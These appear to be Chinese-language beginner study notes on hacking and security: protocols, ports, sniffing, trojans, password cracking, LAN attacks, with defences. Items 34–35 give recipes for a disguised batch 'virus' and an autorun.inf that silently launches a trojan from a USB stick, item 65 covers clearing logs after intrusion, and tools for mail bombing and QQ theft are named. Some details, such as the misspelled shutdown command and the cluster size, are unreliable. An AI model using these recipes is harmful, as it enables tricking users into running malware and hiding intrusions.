一、新人入門
ip地址:當計算機接入internet後,它就擁有ip地址(通過路由器接入internet的計算機查詢的ip,查詢的都是路由器外網ip地址;通過ADSL直接撥號的,查詢的ip都是計算機的外網ip)
ipv4與ipv6:IPv6(1996)是Internet Protocol Version 6的縮寫,譯爲"互聯網協議"。IPv6是IETF用於替代現行版本IP協議(IPv4)的下一代IP協議,號稱可以爲全世界的每一粒沙子編上一個網址 。由於IPv4(32位地址長度約43億個地址)最大的問題在於網絡地址資源有限,嚴重製約了互聯網的應用和發展。IPv6(128位地址長度)的使用,不僅能解決網絡地址資源數量的問題,而且也解決了多種接入設備連入互聯網的障礙 。
端口是指計算機與外界通信交流的出口,按照端口號可分爲:公認端口(0 ~ 1023)、註冊端口(1024 ~ 49151)、動態或私有端口(49152 ~ 65535)
按照協議也可以分爲TCP端口和UDP端口
常用端口:
| 21 | FTP:文件傳輸傳輸協議 |
| 23 | Telnet:遠程登陸協議(主要用於Internet會話,基本功能是允許用戶登錄遠程主機) |
| 53 | DNS:域名服務器 |
| 79 | finger:查看機器的運行請況 |
| 80 | HTTP:超文本傳輸協議 |
| 110 | POP3協議 |
| 139 | NetBIOS服務 |
| 3389 | 遠程登錄服務 |
1、cmd中查看所有開放端口:netstat -a -n
2、默認情況下,計算機中很多不安全的或者無用的端口都處於打開狀態;如何關閉?
實例操作基於TCP中5357端口:
5357端口對應function Discovery Resource Publication服務,它的作用是發佈該計算機以及連接到該計算機的資源,很可能會造成泄密。
操作:win+r輸入control進入控制面板,選擇管理工具→服務→選中function Discovery Resource Publication右鍵關閉服務
3、肉雞:被黑客攻破,並植入了病毒的目標計算機,被隨意擺佈。肉雞也可以是系統。
判斷:上網過程中出現重啓現象;更新或卸載殺毒軟件一閃而過;計算機運行突然變慢,鍵盤燈在像在複製文件時一樣閃爍;登陸QQ、MSN時異常登錄提示,即使當前IP與上次登陸IP一樣;
避免:關閉telnet、remote registry等高危服務端口;及時安裝補丁,升級殺毒軟件;不隨意瀏覽陌生網頁;
4、掛馬:這裏指網頁掛馬,利用各種當手段(SQL注入、網站敏感文件掃描、服務器漏洞等)獲取網站管理員賬號,通過備份\恢復數據庫、上傳漏洞等獲得webshell,用websell修改網頁內容。或者通過弱口令獲得ftp,直接對網站頁面修改。
目前internet中有很多被掛馬的遊戲網站,目的盜取玩家遊戲賬號。不小心進入掛馬網頁,計算機感染病毒,會丟失大量文件資料和賬號密碼,危害極大!
5、後門:黑客控制目標計算機後,向其植入特定的程序,他能幫助黑客達到隨時達到監控目的。
6、TCP/IP協議:網絡通信協議(最基本的協議),它定義了計算機接入internet的方式以及數據傳輸的標準
Transrmission Control Protocol / Internet Protocol 傳輸控制協議/internet互聯網協議
如何工作?
高層TCP協議(A)負責收集信息,後者把文件拆分成更小的數據包。發送端(B)將這些數據包通過網絡傳送到接收端的TCP層(C),然後將數據包還原成原始文件;低底層IP協議(D)處理每個數據包的地址部分,使得網絡上的網關計算機能識別數據包地址並進行路由選擇,讓這些數據包能正確到達目的地。
7、ARP協議:地址解析協議,將已知的IP地址解析成與之對應的物理地址
如何工作?
在TCP/IP網絡環境下,每個主機都分配了一個32bit(比特)的IP地址(如:220.248.138.166),他是在網絡中標識主機的一種邏輯地址。
如果要成功將報文(網絡中主機之間交換與傳輸的數據單元)傳送給目的主機,必須知道目的主機的物理地址,這時就得使用ARP協議。
ARP協議就是主機在發送報文之前將目標主機的IP地址轉換成與之對應的MAC地址
8、ICMP協議:控制報文協議,用於IP主機、路由器之間傳遞控制消息,並將出錯報文發返回發送數據的主機
ICMP唯一的功能是報告問題而不是解決問題,解決問題的任務由發送方完成
也是由於這點,路由器和主機非常容易受到攻擊。如:ping of death 攻擊;
以前操作系統規定ICMP數據包最大尺寸不能超過64KB,而ping of death就是使它超出上限,使主機內存分配錯誤,導致TCP/IP堆棧崩潰,主機死機。
常見洪水攻擊:MAC泛洪、網絡泛洪、應用程序泛洪
MAC泛洪:攻擊者進入局域網,將假冒的源MAC地址和目標MAC地址數據幀發送到以太網上,使得假冒的源MAC地址和目標MAC地址塞滿交換機的MAC地址表,導致交換機無法正確傳送數據。
網絡泛洪(smurf和DDos): smurf指攻擊者假冒ICMP廣播ping,路由器如果沒有關閉定向廣播,那攻擊者就可以在某個網絡內對其他網絡發送定向廣播ping,網絡中的主機越多,結果越嚴重,因爲每個主機默認都會相應ping,最後導致鏈路流量過大而拒絕服務。
DDos:攻擊者將DDos控制軟件安裝在連接Internet的系統中,並感染其他系統,然後攻擊者將攻擊指令發送給DDos控制軟件,讓受DDos控制的系統向某個IP發送大量的假冒網絡流量,讓受攻擊的計算機網絡被這些假的流量所佔據,從而無法爲他們的正常生活提供服務。
應用程序泛洪:消耗應用程序或系統資源,如常見的垃圾郵件!
9、ping命令:用於檢查網絡是否能夠連通的命令。安裝了TCP / IP協議的計算機均可使用該命令
如何操作?
進入仿DOS窗口→cd\ 進入C盤根目錄→輸入ping 127.0.0.1 ;如果ping通則成功安裝了TCP / IP 協議
進入仿DOS窗口→cd\ 進入C盤根目錄→輸入ping www.baidu.com ;如果ping通則已接入Internet,同時也可知道這個域名的地址了
進入仿DOS窗口→cd\ 進入C盤根目錄→輸入ping 所在局域網內的IP地址(如:ping 192.168.1.100) ;如果ping通則成功接入局域網
10、端口監聽:指客戶端所操作的一種信息記錄。只能監視固定的端口
11、nbtstat用於查看基於TCP/IP的NetBIOS協議統計資料,本地計算機和遠程計算機的NetBIOS名稱表和名稱緩存,也可以刷新NetBIOS名稱緩存和使用WINS註冊的名稱;nbtstat -a IP 可以查看指定目標計算機NetBIOS(小型局域網)名稱
12、BIOS “基本輸入輸出系統”,它是一組固化到計算機內主板上一個ROM芯片上的程序,它保存着計算機最重要的基本輸入輸出的程序、開機後自檢程序和系統自啓動程序,它可從CMOS中讀寫系統設置的具體信息。
13、常見的黑客入侵方式:數據驅動攻擊、僞造信息攻擊、針對信息弱點攻擊、遠端操縱、對ICMP報文攻擊、針對源路徑選項的弱點攻擊、以太網廣播攻擊
二、攻防實戰
通過對目標哦計算機的端口掃描,可以知道目標計算機的存在的漏洞和開放的端口,從而爲入侵做好準備。而通過嗅探工具則可以探聽到網絡中的所有數據包,從而輕鬆盜取網絡中計算機用戶隱私信息。
14、常用端口掃描工具:SuperScan、X-Scan
原理:利用數據包來分析目標計算機的相應,以得到目標計算機的端口開放信息以及系統內在的弱點信息
15、嗅探(Sniffer):指探聽網絡中流經的數據包,需要專門的嗅探器方可實現(掌握嗅探原理,認識常用嗅探工具)
16、Sniffer原理:使得安裝了Sniffer的計算機能夠接收局域網中的所有計算機發出的數據包,並對數據包進行分析
在共享式的局域網中,Sniffer工具其實就是一個抓包工具,並且還可以對抓到的數據包進行分析。由於在局域網中,數據包會廣播到網絡中所有主機的網絡接口,在沒有使用Sniffer工具之前,主機的網絡設備會判斷該數據包是否應該接收,從而保證只接收屬於自己的數據包,但安裝Sniffer工具之後,它能使計算機接收所有到達本地計算機的數據包,從而實現網絡監聽。
17、嗅探器也就是Sniffer工具,它使用戶“嗅探”到達本地網路的數據,並檢查進入計算機的信息包,嗅探器不會告訴用戶“問題是什麼”,只告訴“發生了什麼”。
18、常用嗅探工具:Sniffer Pro、艾菲網頁偵探、CaptureNet
19、如何防範端口掃描:關閉閒置和有潛在威脅的端口;利用防火牆屏蔽有掃描症狀的端口;
防火牆工作原理:檢查每個達到本地計算機的數據包,在該數據包被系統中的任何軟件識別之前,防火牆可以拒接接收該數據包,同時也可以禁止本地計算機接收外網傳入的任何數據包。當第一個請求建立連接的數據包被本地計算機迴應後,一個“TCP/IP端口”被打開,此時對方就可以開始掃描本地的端口信息,在掃描過程中對方計算機與本地計算機建立連接,並逐漸打開各個服務對應的“TCP/IP端口”以及閒置的端口,此時防火牆便可以經過自帶的攔截規則進行判斷,就可以知道對方是否正在進行端口掃描,一旦確認對方正在掃描本地計算機端口後,將直接攔截對方發送過來所有需要掃描的數據包。(瑞星防火牆)
20、防範嗅探的常見方式有哪些:對傳輸數據進行加密;採用安全拓撲結構降低嗅探收集的信息;(在網絡中發現嗅探比較困難,因爲它不會留下任何痕跡)
數據加密:在傳輸數據前對數據進行加密,接收後解密。傳統的TCP/IP協議並沒有採用加密方法對數據進行傳輸,即都是明文傳輸,要徹底解決傳輸的數據被嗅探,則需要通過安裝補丁來增強TCP/IP協議。
安全拓撲:嗅探器只能在當前網段中捕獲數據,因此將網段分得越細,那嗅探器能夠收集到的信息就越少。在網絡中,有三種連接設備是嗅探器無法跨越的:交換機、路由器、網橋。Sniffer工具一般是入侵成功後才用來收集數據和信息
21、系統漏洞產生的原因:技術人員的缺陷(人爲因素);硬件設計不兼容(硬件因素)
22、windows系統存在漏洞:核心代碼中潛在的bug;擴展名欺騙;設備文件名問題;龐大複雜的註冊表;系統權限分配繁冗;設計失誤;
23、一個完整的木馬由硬件、軟件、具體鏈接三部分組成;
硬件部分:控制端、服務端、Internet
軟件部分:控制端程序、木馬程序、木馬配置程序
連接部分:控制端/服務器端IP、控制端/木馬端口
24、常見木馬:遠程控制木馬、密碼發送木馬、鍵盤記錄木馬、破壞性質木馬、Dos木馬、代理木馬、FTP木馬、程序殺手木馬、反彈端口型木馬
25、木馬有哪些特性:隱蔽性、自動運行性、欺騙性、自動恢復性、自動打開端口、功能特殊性
26、木馬入侵方式有哪些:修改Win.ini文件、修改System.ini文件、加載到啓動組、修改文件關聯、捆綁文件
27、木馬的僞裝手段:修改圖標、出錯顯示、木馬更名、擴展名欺騙、自我銷燬
28、計算機中木馬後有哪些症狀:無限IE彈窗、彈出奇怪的對話框、系統配置被更改、突然出現大量無法結束的進程
29、防範木馬入侵措施:謹慎運行從網絡上下載的軟件;不輕易打開來歷不明德附件和鏈接;儘量少用共享文件夾;隱藏自己的IP;運行反木馬實時監控程序;
30、病毒類型:
(傳染方式)引導性、文件型、混合型計算機病毒;(破環性)良性、惡性計算機病毒;(鏈接方式)源碼型、嵌入型、外殼型、操作系統型計算機病毒;
31、病毒特徵:刻意編寫、人爲破壞;破壞性;傳染性;隱蔽性;潛伏性;奪取系統控制權;不可預見性;
32、常見病毒傳播途徑:通過移動存儲設備傳播;通過局域網傳播;通過Internet傳播;
33、計算機中病毒後有哪些症狀:無限IE彈窗;開機速度變慢;殺毒軟件被屏蔽;文件圖標變成統一圖案;系統時間被更改;
34、一個重啓計算機病毒 製作:
新建一個文本文檔(文檔名可以隨意改,比如小遊戲),輸入下面字符:
showdown /r
保存後修改後綴爲.bat,然後右鍵屬性創建快捷方式後將源文件藏起來。
並將源文件的屬性改爲隱藏。然後對快捷鍵的文件進行右鍵屬性更改圖標,點擊確定就完成了。
35、U盤病毒製作(利用U盤autorun.inf漏洞):
在U盤中,放入“冰河”木馬服務端,
並手動創建autorun.inf文件,用記事本打開,輸入下面的代碼:
[AutoRun]
OPEN=冰河.exe ‘放入的木馬服務端名
shellexecute=冰河.exe
shell\Auto\command=冰河.exe
然後將這兩個文件右鍵屬性隱藏起來,這樣雙擊啓動U盤時會啓動U盤的那個文件
(當然現在這方法都會被攔截或者系統不會再採用雙擊直接接入移動硬盤這種方法了)
36、(密碼攻防)常見加密類型:對稱加密(採用同一個密鑰)、非對稱加密(兩個密碼,當使用其中一個加密,解密就必須使用另外一個)
37、破解密碼常用方式:暴力窮舉、擊鍵記錄、屏幕記錄、Internet釣魚、嗅探、密碼心理學
38、破解常見的文件密碼:一般利用Internet中指定的破解工具進行破解,破解密碼時,主要採用暴力破解爲主,如:Advanced Office Password Recovery(針對Office文檔密碼)、RAR Password Unlocker(針對WinRAR)、星號密文查看器
PDF電子文檔可以利用Adobe Acrobat進行加密,而破解PDF加密文檔可以利用Advanced PDF Password Recovery軟件來實現,當計算機中安裝Adobe Acrobat版本爲8.0以上時則不行,因爲8.0以上版本採用分層次的加密方式
39、防範密碼被輕易破解,需要設置安全係數高的密碼;爲確保數據安全,也可以對電腦磁盤右鍵啓用Windows BitLocker驅動加密工具爲指定的磁盤分區進行加密,防範他人非法盜取
40、遠程控制原理:客戶端程序向遠程主機發送身份驗證信息和連接請求,通過驗證後建立遠程連接,從而實現遠程控制
41、常見遠程控制類別:點對點的遠程控制、點對多的遠程控制
42、在Windows中可以利用IPC$和Telnet實現遠程入侵
43、防範IPC$遠程入侵常用方法:禁用共享和NetBIOS、設置本地安全策略(一般系統會啓用)、修改註冊表
禁用共享和NetBIOS:
進入網絡共享中心→更改適配器→選擇本機的網絡,右鍵點擊屬性→取消勾選(Microsoft網絡的文件和打印機共享)→找到(TCP/IPV4)協議,點擊屬性→高級→選擇WINS→NetBIOS框中,選擇禁用TCP/IP上的NetBIOS
設置本地安全策略:
控制面板→系統和安全→管理工具→本地安全策略組→本地策略→安全選項→...→啓用
44、如何關閉與遠程控制相關的服務
Windows中,與遠程控制相關的服務主要有Remote Registry 服務和Telnet服務
管理工具→服務→禁用Remote Registry
控制面板→程序→啓用或關閉Windows功能→取消勾選Telnet服務器、Telnet客戶端
45、局域網是指在某一區域內由多臺計算機互聯成的計算機組,它可以實現文件管理和共享等功能
46、常見的局域網攻擊:ARP欺騙、廣播風暴、DNS欺騙、DDos攻擊
ARP欺騙:僞造不存在的MAC地址,達到截獲數據包的目的,它將導致局域網出現網絡不通的現象(局域網中的網絡流通是按照MAC地址進行傳輸的)
廣播風暴:指局域網中塞滿了大量的廣播幀或廣播數據包,從而導致局域網設備無法正常運行或癱瘓(網絡短路、蠕蟲病毒、網絡視頻、惡劣環境 都可引發廣播風暴)
局域網中,數據幀的傳輸方式有三種:單播幀(點對點)、多播幀(一對多)、廣播幀(對所有計算廣播FF-FF-FF-FF-FF-FF)
DNS欺騙:攻擊者將自己的計算機僞裝成域名服務器,當用戶訪問制定網頁時,打開的是目標主頁,並非真正的網頁
IP衝突常常出現在局域網中,指局域網中出現兩臺或以上計算機同時使用了同一個IP地址。(通過設置DHCP參數解決)
DDoS攻擊(分佈式拒絕服務):這是多個DoS攻擊源的集合。DDoS攻擊能夠利用合理的服務請求佔用過多的服務資源,使服務器無法處理合法用戶的指令。它的攻擊方式有很多種,佔用資源是最常用的一種(如利用傀儡機攻擊)。
47、局域網攻擊:攻擊局域網之前,攻擊者一般先了解局域網中計算機數量、共享資源等信息,目標確定後便可發起攻擊。常用工具:LanSee局域網查看工具、NetCut控制工具。
48、入侵無線局域網常用手段:接入開放的無線局域網、偵測入侵無線存儲設備、破解無限局域網密碼
49、抵制局域網攻擊常用手段:利用ARP防火牆防禦欺騙、利用網絡守護神防禦DNS攻擊、對無線登陸密碼設置更安全的WPA2-PSK加密(路由器現在一般都是使用這個)
50、惡意代碼:又稱網頁病毒,惡意軟件,他的編寫大多數處於商業或者探測資料目的。特徵:惡意的目的、本身是程序、通過執行發生作用。
51、惡意代碼的傳播途徑主要有:利用軟件漏洞傳播、利用電子郵件傳播
傳播趨勢:種類更模糊、多平臺攻擊、同時攻擊服務器和客戶機
52、遭受惡意代碼攻擊後的通常症狀:IE默認主頁和標題被篡改、IE瀏覽器部分設置被禁止、格式化磁盤
53、常見的網站漏洞:上傳漏洞、暴庫、注入、旁註、COOKIE詐騙(例如用”啊D注入“來獲取網頁中管理員密碼)
54、如何提高IE瀏覽器係數安全:定期清理Internet臨時文件、取消自動記憶網頁密碼、添加可信站點和受限站點
55、郵箱探測密碼工具:“流光”(Fluxay)、“黑雨POP3郵箱密碼暴力破解器”、WebCracker
POP3,全名爲"Post Office Protocol - Version 3",即"郵局協議版本3"。
是TCP/IP協議族中的一員,由RFC1939 定義。
本協議主要用於支持使用客戶端遠程管理在服務器上的電子郵件。
提供了SSL加密的POP3協議被稱爲POP3S。
POP:賣點廣告/移動端開發平臺?
Internet中大多數郵件服務都是使用UNIX系統,包括Solaris、HPUX、AIX、IRIX等。
其中最通用的配置是運行sendmail和popper服務軟件。
其中sendmail是SMTP服務器,專門負責接收和發送郵件。
而popper是通過POP3協議來專門負責用戶讀取和處理郵件的請求。
56、常見的郵箱攻擊方式有:發送垃圾郵件、發送攜帶病毒木馬的郵件、郵件炸彈攻擊
57、如和發動郵箱炸彈攻擊,工具:億虎Email羣發大師
58、如何防範郵箱炸彈的攻擊:求援ISP、使用郵箱的轉信功能、巧用郵箱的來信分類功能、謹慎使用自動回覆
59、QQ盜取?工具介紹:QQ簡單盜、QQ眼睛、風雲QQ尾巴、QQ細胞(攻擊器)
60、攻擊者在入侵目標計算機時,爲了不讓用戶發現自己,會利用代理服務器作爲跳板進行隱匿入侵攻擊。無論採取何種入侵攻擊者都會在目標計算機中留下痕跡,爲防止順藤摸瓜找到自己,攻擊者會在入侵成功後清楚這些痕跡。
跳板技術:建立一條通往目標計算機的鏈接來入侵目標計算機,這樣一來,即使被反向追蹤,也很難發現真正的攻擊者。
確定目標、設計跳板、跳板入侵、清楚日誌
61、代理服務器(Proxy Server):介於計算機和Web服務器之間的服務器,利用代理服務可以提高上網速度和訪問國外的一些網站。主要作用就是代理網絡用戶去取得網絡信息。簡單說就是網絡中轉站。
工具介紹:代理獵手(尋找代理服務器)、SocketCap(設置代理上網)
62、跳板攻擊防範工具:“流光”(Fluxay)
63、追蹤工具:NeoTrace Pro、Shift後門生成器
後門可以按照很多方式來分類(技術方面):網頁後門、線程插入後門、擴展後門、C/S後門(即“客戶端/服務端”控制方式)
清除痕跡:系統的痕跡就記錄在Windows事件日誌和IIS日誌中
64、Windows事件日誌記錄了在系統或程序中發生的、要求通知用戶的重要事情、它可以幫助用戶預測潛在的系統問題。(應用程序日誌、安全日誌、系統日誌、安裝程序日誌、ForwardedEvents日誌)
65、如何清除Windows默認日誌?
管理工具→事件查看器→Windows日記→設置(右擊屬性)→選按需要覆蓋時間(舊事件優先)→清楚日誌→清除
三、安全與預防
67、文件刪除後是否在計算機中消失?
刪除文件只是釋放文件在硬盤中所佔的空間,並未在計算機中徹底消失,並且文件內容任然存在磁盤中。
刪除文件其實是修改文件頭的前兩個代碼,這種修改映射在FAT表中,就爲文件做刪除標記,並將文件所佔簇號(一簇=1024KB)在FAT表中的登記項清零,表示釋放該文件所在空間,這也是平常刪除文件後,磁盤空間增大的原因。
而文件的真正數據內容仍保存在數據區中,並未刪除,只有等到以後的數據寫入,並將此數據覆蓋掉纔算是徹底把原來的數據刪除。如果不被後來保存的數據覆蓋,它就不會從磁盤上抹掉。
推薦工具:FinalData